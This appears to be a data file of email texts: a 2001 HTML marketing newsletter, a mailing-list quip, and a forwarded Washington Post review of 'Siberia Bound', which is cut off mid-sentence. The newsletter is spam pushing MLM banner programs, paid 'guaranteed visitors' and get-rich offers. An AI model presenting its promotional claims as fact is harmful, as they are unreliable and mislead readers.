 		    &lt;br&gt;&lt;br&gt;&lt;/font&gt;
 		    &lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#003366" align="center" valign="top"&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
     &lt;!-- End Article Headlines Table --&gt;
     &lt;!-- PROMOTION START --&gt;
 		&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;
 		&lt;br&gt;&lt;b&gt;Today's Special Announcement:&lt;/b&gt;&lt;br&gt;
 		&lt;!-- Promotion Image --&gt;
 		&lt;br&gt;
 		&lt;br&gt;We can help you become an Internet Service &lt;br&gt;provider within 7 days or we will give you $100.00!!
 &lt;br&gt;&lt;a href="http://www.SELLinternetACCESS.com"&gt;Click Here&lt;/a&gt;
 &lt;br&gt;We have already signed 300 ISPs on a 4 year contract, 
 &lt;br&gt;see if any are in YOUR town at:
 &lt;br&gt;&lt;a href="http://www.Find-Local-ISP.com"&gt;Click Here&lt;/a&gt;
 &lt;br&gt;&amp;nbsp;&lt;p&gt;
 &lt;br&gt;&amp;nbsp;&lt;p&gt;
 You are a member in at least one of these programs 
 - You should be in them all! &lt;br&gt;
 &lt;a href="http://www.BannersGoMLM.com"&gt; BannersGoMLM.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.ProfitBanners.com"&gt; ProfitBanners.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.CashPromotions.com"&gt; CashPromotions.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.MySiteInc.com"&gt; MySiteInc.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.TimsHomeTownStories.com"&gt; TimsHomeTownStories.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.FreeLinksNetwork.com"&gt; FreeLinksNetwork.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.MyShoppingPlace.com"&gt; MyShoppingPlace.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.BannerCo-op.com"&gt; BannerCo-op.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.PutPEEL.com"&gt; PutPEEL.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.PutPEEL.net"&gt; PutPEEL.net &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.SELLinternetACCESS.com"&gt; SELLinternetACCESS.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.Be-Your-Own-ISP.com"&gt; Be-Your-Own-ISP.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.SeventhPower.com"&gt; SeventhPower.com &lt;/a&gt;&lt;p&gt;
         &lt;br&gt;&lt;br&gt;
 		&lt;/font&gt;
     &lt;!-- PROMOTION END --&gt;
 	&lt;/td&gt;
 	&lt;td rowspan="2" width="420" valign="top"&gt;
 	&lt;!-- Begin Greeting and Intro paragraph --&gt;
 		&lt;table border="0" cellpadding="2" cellspacing="0" width="100%"&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#ffffff" valign="top"&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 			&lt;td bgcolor="#ffffff" valign="top"&gt;
             &lt;font size="2" face="Verdana,Arial,Helvetica"&gt;
             &lt;b&gt;&lt;/b&gt;
 			&lt;br&gt;Information to provide you with the absolute 
 &lt;br&gt;best low and no cost ways of providing traffic 
 &lt;br&gt;to your site, helping you to capitalize on the power &lt;br&gt;and potential the web brings to every Net-Preneur. &lt;br&gt;
 --- This Issue Contains Sites Who Will Trade Links With You! --- &lt;br&gt;
 			&lt;br&gt;&lt;br&gt;&lt;/font&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#003366" colspan="2" height="3" valign="bottom"&gt; &lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#ffffff" colspan="2" height="2" valign="bottom"&gt; &lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#003366" colspan="2" height="2" valign="bottom"&gt; &lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;!-- End Greeting and Intro paragraph --&gt;
 	&lt;!-- Begin Article Table --&gt;
 		&lt;table border="0" cellpadding="4" cellspacing="0" width="100%"&gt;
          &lt;tr&gt;&lt;td bgcolor="#ffffff" colspan="2" valign="top"&gt;&lt;a name="article1"&gt;&lt;/a&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;li&gt;&lt;b&gt;Internet Success Through Simplicity&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#ffffff" valign="top"&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;&lt;td bgcolor="#ffffff" valign="top"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica"&gt;&lt;BR&gt;Every day of the week, I get questions from people all  
  &lt;BR&gt;over the world, including my No BS GIMG Members,  
  &lt;BR&gt;wanting to know some of the most valuable "secrets" 
  &lt;BR&gt;to my on-going internet success.
  &lt;BR&gt;
  &lt;BR&gt;Let me say, above all else, I don't believe there are any 
  &lt;BR&gt;*true* "secrets" to success on the Net. What you do to 
  &lt;BR&gt;become successful in the online world is not a "secret", 
  &lt;BR&gt;in my opinion. Most successful people follow simple, clear, 
  &lt;BR&gt;repeatedly-proven strategies to succeed, whether on the 
  &lt;BR&gt;Net or off.
  &lt;BR&gt;
  &lt;BR&gt;But, when it comes to someone asking for advice, 
  &lt;BR&gt;consultation, or simply asking, "What's your secret?", 
  &lt;BR&gt;I have to blush &amp; say ...
  &lt;BR&gt;
  &lt;BR&gt;Persistence and personality.
  &lt;BR&gt;
  &lt;BR&gt;Of course, I always follow the advice with my own little 
  &lt;BR&gt;disclaimer: What makes ME successful may not work the 
  &lt;BR&gt;same for YOU ... &amp; your first lesson is to get over 
  &lt;BR&gt;the deep-seeded idea that success - of any kind, in  
  &lt;BR&gt;my opinion - is somehow an unknown, unattainable secret.
  &lt;BR&gt;
  &lt;BR&gt;Clearly, it is not. It's not unknown. It's not unattainable. 
  &lt;BR&gt;It's not years of digging to find the "secrets" to internet riches.
  &lt;BR&gt;
  &lt;BR&gt;One thing that "gets to me" so often in my work as an 
  &lt;BR&gt;Internet Consultant, author and Internet Success 
  &lt;BR&gt;Strategist is that so many people on the Net seem to 
  &lt;BR&gt;have this incredibly huge mental block that stands 
  &lt;BR&gt;between themselves and success on the Net. It's 
  &lt;BR&gt;almost as if they've been barraged by so many claims 
  &lt;BR&gt;of what works and what doesn't work, and so many 
  &lt;BR&gt;LONG, complicated routes to actually succeeding in 
  &lt;BR&gt;their online venture, that "success" is the  &lt;BR&gt;equivelant of a 100-foot high brick wall.
  &lt;BR&gt;
  &lt;BR&gt;It's NOT that difficult, my friends! It is NOT that complicated!!
  &lt;BR&gt;
  &lt;BR&gt;Long-time friend and business associate Rick Beneteau 
  &lt;BR&gt;has a new eBook out called Branding YOU &amp; Breaking 
 &lt;BR&gt;the Bank. Get it!! 
  &lt;BR&gt;&lt;a href="http://www.roibot.com/bybb.cgi?IM7517_bybtb"&gt;http://www.roibot.com/bybb.cgi?IM7517_bybtb&lt;/a&gt; . 
  &lt;BR&gt;But, the reason I mention this is the fact that he talks 
  &lt;BR&gt;so dynamically about the true simplicity of making your 
  &lt;BR&gt;online venture a success. 
  &lt;BR&gt;
  &lt;BR&gt;And, yes, Rick &amp; I come from the same school of 
  &lt;BR&gt;"self marketing" - marketing YOU! Obviously, that's 
  &lt;BR&gt;the core of his excellent new ebook, and I couldn't 
  &lt;BR&gt;agree with him more.
  &lt;BR&gt;
  &lt;BR&gt;Point being, *you* ARE everything you do online to 
  &lt;BR&gt;succeed. You ARE your web site, your business, your 
  &lt;BR&gt;marketing piece, your customer service, your customers' 
  &lt;BR&gt;experiences with your business -- ALL of it, is YOU! 
  &lt;BR&gt;Read his ebook &amp; you'll see more of what I'm saying.
  &lt;BR&gt;
  &lt;BR&gt;The matter at hand is that brick wall you might have 
  &lt;BR&gt;standing high as you can see, blocking the path 
  &lt;BR&gt;between you &amp; internet success. Listen to me - it is 
  &lt;BR&gt;not real OK? It doesn't exist. There's nothing there 
  &lt;BR&gt;to fear to begin with ... get over it!!
  &lt;BR&gt;
  &lt;BR&gt;What I'm telling you is, the only thing standing between 
  &lt;BR&gt;you and the success you most desire ... is yourself. 
  &lt;BR&gt;When you realize this, you will tear down that brick 
  &lt;BR&gt;wall by means of complete and instantaneous 
  &lt;BR&gt;disintegration. It will no longer exist *in your mind*, 
  &lt;BR&gt;which is the only "real" place it ever was anyhow!
  &lt;BR&gt;
  &lt;BR&gt;Yes, "persistence and personality" inherently includes 
  &lt;BR&gt;honesty, integrity, accountability, and many other 
  &lt;BR&gt;qualities but you also have to hone in on your ultimate 
  &lt;BR&gt;goals and realize that probably the most valuable,  
  &lt;BR&gt;powerful key to your success ... is YOU!
  &lt;BR&gt;
  &lt;BR&gt;That may be the most incredible "secret" we ever 
  &lt;BR&gt;uncover in our lifetime! And, trust me, that brick wall 
  &lt;BR&gt;won't ever get in your way again ... unless you let it.
  &lt;BR&gt;
  &lt;BR&gt;Talk about SIMPLE!!
  &lt;BR&gt;
  &lt;BR&gt;------------------------------------------------------
  &lt;BR&gt;Bryan is a "veteran"  Internet  Consultant, Author, 
  &lt;BR&gt;Internet Success Strategist &amp; Marketer. He publishes 
  &lt;BR&gt;Mega-Success.com Chronicles to over 11,500  subscribing 
  &lt;BR&gt;members, authors articles which appear all over the 
  &lt;BR&gt;Net, and helps hundreds of wealth-hungry people in 
  &lt;BR&gt;their journey to Internet success. 
  &lt;BR&gt;
  &lt;BR&gt;Bryan is also Director of his No BS Guerrilla Internet 
  &lt;BR&gt;Marketing Group at &lt;a href="http://NoBSGuerrillaInternetMarketing.com"&gt;http://NoBSGuerrillaInternetMarketing.com&lt;/a&gt; 
  &lt;BR&gt;&amp; a fantastic new Joint Venture Partners program 
  &lt;BR&gt; for that site.
  &lt;BR&gt;
  &lt;BR&gt;Bryan Hall is a Founding Member and the Development 
  &lt;BR&gt;Consultant for the prestigious iCop(TM) at 
  &lt;BR&gt;&lt;a href="http://www.i-cop.org/1016.htm
 "&gt;http://www.i-cop.org/1016.htm
 &lt;/a&gt; &lt;BR&gt;
  &lt;BR&gt;You  can  reach  Bryan  at  877.230.3267  or  by
  &lt;BR&gt;emailing  him directly at bryan.hall@mega-success.com&lt;br&gt;&lt;p&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#003366" colspan="2" valign="bottom"&gt; &lt;/td&gt;&lt;/tr&gt; 
          &lt;tr&gt;&lt;td bgcolor="#DBE8F4" colspan="2" valign="top"&gt;&lt;a name="article2"&gt;&lt;/a&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;li&gt;&lt;b&gt;Member Showcase&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#DBE8F4" valign="top"&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;&lt;td bgcolor="#DBE8F4" valign="top"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica"&gt;&lt;p&gt;&lt;i&gt;Examine carefully - Those with email addresses included WILL&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;TRADE LINKS with you... You are encouraged to contact them.&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;There Are Many Ways To Build A Successful Business - Just look at&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;these successful sites &amp;amp; programs other members are involved
 in...&lt;/i&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;Get INSANE amounts of traffic to your website.
 &lt;br&gt;Purchase 10,000 Guaranteed Visitors to your site
 &lt;br&gt;and receive 5,000 free. MORE TRAFFIC = MORE MONEY!
 &lt;br&gt;Less than 2cents a visitor.&amp;nbsp; Space is limited.
 &lt;br&gt;Order Now! &lt;a href="http://www.freepicklotto.com"&gt;http://www.freepicklotto.com&amp;nbsp;&lt;/a&gt;
 &lt;br&gt;Trade Links - &lt;a href="mailto:businessopps@aol.com"&gt;businessopps@aol.com&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;Stop Smoking - Free Lesson !!
 &lt;br&gt;Discover the Secret to Stopping Smoking.
 &lt;br&gt;To Master these Powerful Techniques, Come to
 &lt;br&gt;&lt;a href="http://www.breath-of-life.net"&gt;http://www.breath-of-life.net&lt;/a&gt;
 for your Free Lesson.
 &lt;br&gt;Act Now!&amp;nbsp; P.S. Tell someone you care about.
 &lt;br&gt;Trade Links - &lt;a href="mailto:jturco3@hotmail.com"&gt;jturco3@hotmail.com&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;Celebration Sale!
 &lt;br&gt;$99.00 on Casinos/Sportsbetting sites, Lingerie stores,
 &lt;br&gt;Gift Stores, Adult Sites &amp;amp; Toy Stores.
 &lt;br&gt;Mention Ad#BMLM99 to receive this special sale price.
 &lt;br&gt;Order Now!
 &lt;br&gt;&lt;a href="http://www.cyberopps.com/?=BMLM99"&gt;http://www.cyberopps.com/?=BMLM99&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;Affiliates of the World!
 &lt;br&gt;Top rated affiliate programs, excellent business opportunities,
 &lt;br&gt;great marketing resources and free advertising for you!
 &lt;br&gt;Visit the site to trade links. &lt;a href="http://www.affiliates.uk.com"&gt;http://www.affiliates.uk.com&lt;/a&gt;
 &lt;br&gt;Trade Links - &lt;a href="mailto:adrianbold@affiliates.uk.com"&gt;adrianbold@affiliates.uk.com&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;JUST BEEN RELEASED!!
 &lt;br&gt;Internet Marketing guru Corey Rudl has just released a
 &lt;br&gt;BRAND NEW VERSION of his #1 best-selling Internet Marketing
 &lt;br&gt;Course,"The Insider Secret's to Marketing Your Business on
 &lt;br&gt;the Internet". A MUST HAVE! So don't hesitate,
 &lt;br&gt;visit.. &lt;a href="http://www.adminder.com/c.cgi?start&amp;bgmlmezine"&gt;http://www.adminder.com/c.cgi?start&amp;amp;bgmlmezine&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;We have a 260 page catalog with over 3000 gift items for men,
 &lt;br&gt;women, children - A gift for everyone. We show 100 gift items
 &lt;br&gt;on our web site alone, with the catalog&amp;nbsp; you have access to
 &lt;br&gt;the rest. We also feel we have the best prices on the web.
 &lt;br&gt;Visit at &lt;a href="http://www.treasuresoftomorrow.net"&gt;http://www.treasuresoftomorrow.net&lt;/a&gt;
 &lt;br&gt;Trade Links - &lt;a href="mailto:george1932me@yahoo.com"&gt;george1932me@yahoo.com&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;&lt;i&gt;If you have a product, service, opportunity or quality merchandise&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;that appeals to people worldwide, reach your targeted audience!&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;For a fraction of what other large newsletters charge you can exhibit&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;your website here, and trade links for only $8 CPM.&amp;nbsp; Compare
 that&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;to the industry average of $10-$15 CPM. Why?... Because as a&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;valuable member we want you to be successful! Order today -&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;Showcases are limited and published on a first come, first serve
 basis.&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;For our secure order form, click here:&lt;/i&gt; &lt;a href="http://bannersgomlm.com/ezine"&gt;http://bannersgomlm.com/ezine&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;&lt;p&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#003366" colspan="2" valign="bottom"&gt; &lt;/td&gt;&lt;/tr&gt; 
 &lt;!-- START CONDITIONAL HTML HIDING 
  &lt;tr&gt;&lt;td bgcolor="#FFFFFF" colspan="2" valign="top"&gt;&lt;a name="article3"&gt;&lt;/a&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;li&gt;&lt;b&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFFFFF" valign="top"&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" valign="top"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica"&gt;&lt;br&gt;&lt;p&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#003366" colspan="2" valign="bottom"&gt; &lt;/td&gt;&lt;/tr&gt; 
  END OF CONDITIONAL HTML HIDING --&gt; 
 		 &lt;tr&gt;&lt;td bgcolor="#DBE8F4" colspan="2" valign="top"&gt;&lt;a name="article4"&gt;&lt;/a&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;li&gt;&lt;b&gt;Win A FREE Ad In Community &amp; Commentary&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#DBE8F4" valign="top"&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;&lt;td bgcolor="#DBE8F4" valign="top"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica"&gt;&lt;p&gt;To keep this interesting, how about this, every month we'll
 &lt;br&gt;draw a name from the replies and that person will win one
 &lt;br&gt;Sponsorship Showcase ad in the Community &amp;amp; Commentary, for FREE.
 &lt;br&gt;That's a value of over $700.00! Respond to each weekly survey,
 &lt;br&gt;and increase your chances to win with four separate entries.
 &lt;p&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; QUESTION
 OF THE WEEK (07/06/01)...
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; No right or wrong answers, and just by answering
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; you are entered to win a Showcase ad - Free!
 &lt;p&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ~~~ Do you spend more or less time ~~~
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ~~~ online in the summer months? ~~~
 &lt;p&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; More&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="mailto:one@AEOpublishing.com"&gt;mailto:one@AEOpublishing.com&lt;/a&gt;
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Less&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="mailto:two@AEOpublishing.com"&gt;mailto:two@AEOpublishing.com&lt;/a&gt;
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Same&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="mailto:three@AEOpublishing.com"&gt;mailto:three@AEOpublishing.com&lt;/a&gt;
 &lt;p&gt;To make this as easy as possible for you, just click on the
 &lt;br&gt;e-mail address that matches your answer - you do not need to
 &lt;br&gt;enter any information in the subject or body of the message.
 &lt;p&gt;** ADD YOUR COMMENTS!&amp;nbsp; Follow directions above and
 &lt;br&gt;add your comments in the body of the message, and we'll
 &lt;br&gt;post the best commentaries along with the responses.
 &lt;p&gt;You will automatically be entered in our drawing for a free
 &lt;br&gt;Sponsorship ad in the Community &amp;amp; Commentary. Please
 &lt;br&gt;respond only one time per question.&amp;nbsp; Multiple responses
 &lt;br&gt;from the same individual will be discarded.
 &lt;p&gt;
 Last Weeks's Results (06/29/01)
 &lt;BR&gt;&lt;p&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ~~~ What is the goal of your website? ~~~
 &lt;p&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Sell&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;40%
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Get Leads&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;20%
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Build Branding&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;5%
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Provide Information&amp;nbsp; 20%
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Other&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 15%
 &lt;p&gt;
 Comments:
 &lt;BR&gt;----------------------------
 &lt;BR&gt;Our web site is initially designed to get leads, build 
 branding, and provide information.......with a 12 month goal 
 of selling our service more specifically via a shopping cart. 
 We offer a service and at this time take deposits and payments 
 via our site.
 Our site has been up less than 2 months and our expectation 
 was that we would refer to our site for leads developed in 
 traditional media and by referral for more information, and 
 to make a professional impression on someone you may not 
 meet before providing service.
 The growth of our customer base shopping on line has grown 
 outside of anyone's expectations.......certainly mine and 
 I've been in this business for 25 years. The Internet is not 
 dead in the horse business, it is just getting it's legs, and 
 the folks using it want to get all the ancillary services 
 on-line as well. Our site (the first we've developed) has 
 exceeded our expectations, and we aren't satisfied with it 
 yet.......we just wanted to get it there for information!
 &lt;BR&gt; Jeff and Rebecca Marks &lt;a href="http://www.grand-champion.com"&gt;http://www.grand-champion.com&lt;/a&gt;
 &lt;P&gt;-------------------------------------------------
 &lt;BR&gt;Branding. While quality customer service and product 
 have been and will always be our top priority brand building 
 Zesto is our most challenging task.
 &lt;BR&gt;Zesto.com ranks very high and most often #1 or 2 on 
 all major search engines and directories even Yahoo entering 
 the keyword zesto. The problem is simply that,who if anyone 
 would type the keyword zesto, therefore we must try to 
 build our brand by ensuring that generic keywords associated with our products (citrus peel) are used throughout 
 our site as well as search engine submissions.
 &lt;BR&gt;Fortunately owning a non generic domain short, easy 
 to remember and trademarked works in our favor because 
 the marketability potential is limitless.
 &lt;BR&gt;Arlene Turner  &lt;a href="http://www.zesto.com"&gt;http://www.zesto.com&lt;/a&gt;&lt;br&gt;&lt;p&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#003366" colspan="2" valign="bottom"&gt; &lt;/td&gt;&lt;/tr&gt; 
          &lt;tr&gt;&lt;td bgcolor="#ffffff" colspan="2" valign="top"&gt;&lt;a name="article5"&gt;&lt;/a&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;li&gt;&lt;b&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#ffffff" valign="top"&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;&lt;td bgcolor="#ffffff" valign="top"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica"&gt;To change your subscribed address,
 &lt;br&gt;send both new and old address to &lt;a href="mailto:Submit@AEOpublishing.com"&gt;Submit&lt;/a&gt;
 &lt;br&gt;See below for unsubscribe instructions.
 &lt;p&gt;Please send suggestions and comments to: &lt;a href="mailto:Editor@AEOpublishing.com"&gt;Editor&lt;/a&gt;
 &lt;br&gt;I invite you to send your real successes and showcase 
 your strategies and techniques, or yes, even your total bombs, 
 "Working Together We Can All Prosper." &lt;a href="mailto:Submit@AEOpublishing.com"&gt;Submit&lt;/a&gt;
 &lt;p&gt;For information on how to sponsor Your Membership 
 Community &amp;amp; Commentary visit: &lt;a href="http://bannersgomlm.com/ezine"&gt;Sponsorship
 Showcase&lt;/a&gt;
 &lt;p&gt;Copyright 2001 AEOpublishing.com&lt;br&gt;&lt;p&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#ffffff" colspan="2" valign="bottom"&gt; &lt;/td&gt;&lt;/tr&gt; 
         &lt;/table&gt;
 	&lt;!-- End Article Table --&gt;
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 	&lt;td bgcolor="EEEEDF" valign="bottom" align="center"&gt;
 	&lt;!-- Begin Email and Site URL Links --&gt;
 	&lt;hr color="#003366" size="1" width="100%"&gt;
 	&lt;font size="1" face="Verdana,Arial,Helvetica" color="#003366"&gt;
 	&lt;b&gt;&lt;a href="mailto:YourMembership2@AEOpublishing.com"&gt;&lt;font size="1" face="Verdana,Arial,Helvetica" color="#003366"&gt;email us&lt;/font&gt;&lt;/a&gt; &amp;nbsp;::&amp;nbsp; &lt;a href="http://www.AEOpublishing.com"&gt;&lt;font size="1" color="#003366"&gt;visit our site&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 	&lt;hr color="#003366" size="1" width="100%"&gt;
     &lt;b&gt;phone: &lt;/b&gt;
     &lt;hr color="#003366" size="1" width="100%"&gt;
 	&lt;!-- End Email and Site URL Links --&gt;
 	&lt;!--  You are required by your Constant Contact user agreement to
 	    provide the opt-out link shown below as by the property 'OptOut'. --&gt;
     &lt;font size="1" face="Verdana,Arial,Helvetica"&gt;
     This email was sent to &lt;br&gt;jm@netnoteinc.com, &lt;br&gt;at your request, &lt;br&gt;by &lt;a href="http://ccprod.roving.com/roving/sa/s.jsp?id=bd7n7877.7giv5d57"&gt;Your Membership Newsletter Services&lt;/a&gt;.  
     &lt;p&gt;Visit our Subscription Center &lt;br&gt;to &lt;a href="http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.7giv5d57&amp;m=bd7n7877&amp;ea=jm@netnoteinc.com"&gt;edit&lt;/a&gt; your interests or &lt;a href="http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.7giv5d57&amp;m=bd7n7877&amp;ea=jm@netnoteinc.com"&gt;unsubscribe&lt;/a&gt;.
     &lt;p&gt;View our &lt;a href="http://ccprod.roving.com/roving/CCPrivacyPolicy.jsp"&gt;privacy policy&lt;/a&gt;.  
     &lt;p&gt;Powered by&lt;br&gt;&lt;a href="http://www.constantcontact.com/index.jsp?cc=ccnws" target="_blank"&gt;&lt;img src="http://ccprod.roving.com/roving/images/cc-logo-color-sm.gif" border="0" alt="Constant Contact"&gt;&lt;/a&gt;
     &lt;/font&gt;
     &lt;br&gt;&lt;br&gt;
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/HTML&gt;
 ---1347074105.994417746234.JavaMail.RovAdmin.rovweb002--
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; - Joe
 &gt; 
 &gt; P.S. I hate everybody.
 one up: I hate everything post-(the first ten seconds of the universe),
 but especially everybody and everything, and including but not limited to
 puppies and ice cream.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Washington Post Review of Xander's Book, _Siberia Bound_
</t>
  </si>
  <si>
    <t xml:space="preserve">... I'll assume that, on general principle, you've all gone out and 
 bought a copy of fellow FoRKer Alexander Blakely's new book. While the 
 review is broadly fair, I have to admit that the criticisim is a little 
 facile. The key to writing, as with software, is to take away detail, 
 not add more. But even a map would have helped with all the details of 
 how vast Xander &amp; Natasha (&amp; Max!!)'s territory is...
 Best,
    Rohit
 PS. feel free to drop by SF tonight for his reading/signing!
 ===============================================================
 Monday, August 19 at 7 pm
 Alexander Blakely
 Siberia Bound is a coming-of-age account of life as an entrepreneur in a 
 new wild-and-free-market Russia of the early 1990s. Alexander Blakely 
 uses his gift for storytelling to describe the four years he spent 
 living and working toward the American dream in the former Soviet Union.
 A Clean Well-Lighted Place for Books
 at Opera Plaza
 601 Van Ness Avenue
 San Francisco, CA 94102
 OUR DIGITS
 Phone: (415) 441-6670
 Fax: (415) 567-6885
 Email: books@bookstore.com
 =====================================================
 http://www.washingtonpost.com/wp-dyn/articles/A24428-2002Aug15.html
 'Siberia Bound: Chasing the American Dream on Russia's Wild Frontier' by 
 Alexander Blakely
 Reviewed by David Tuller
 Sunday, August 18, 2002; Page BW08
 SIBERIA BOUND
 Chasing the American Dream On Russia's Wild Frontier
 By Alexander Blakely
 Sourcebooks. 320 pp. $22.95
 Judging from Siberia Bound, Alexander Blakely seems like a pretty cool 
 guy -- adventurous, engaging and fun to hang out with. After all, most 
 chroniclers of Russian life base their tales in Moscow or, alternately, 
 St. Petersburg, the most livable of Russia's not-very-livable cities. 
 Deciding instead to settle in a former academic community outside of 
 Novosibirsk, one of Siberia's major cities, Blakely set out to pursue, 
 as his book's subtitle declares, "the American dream on Russia's wild 
 frontier."
 Blakely, who moved to Siberia after finishing college with an economics 
 degree, has a breezy writing style. And although his book is flawed in 
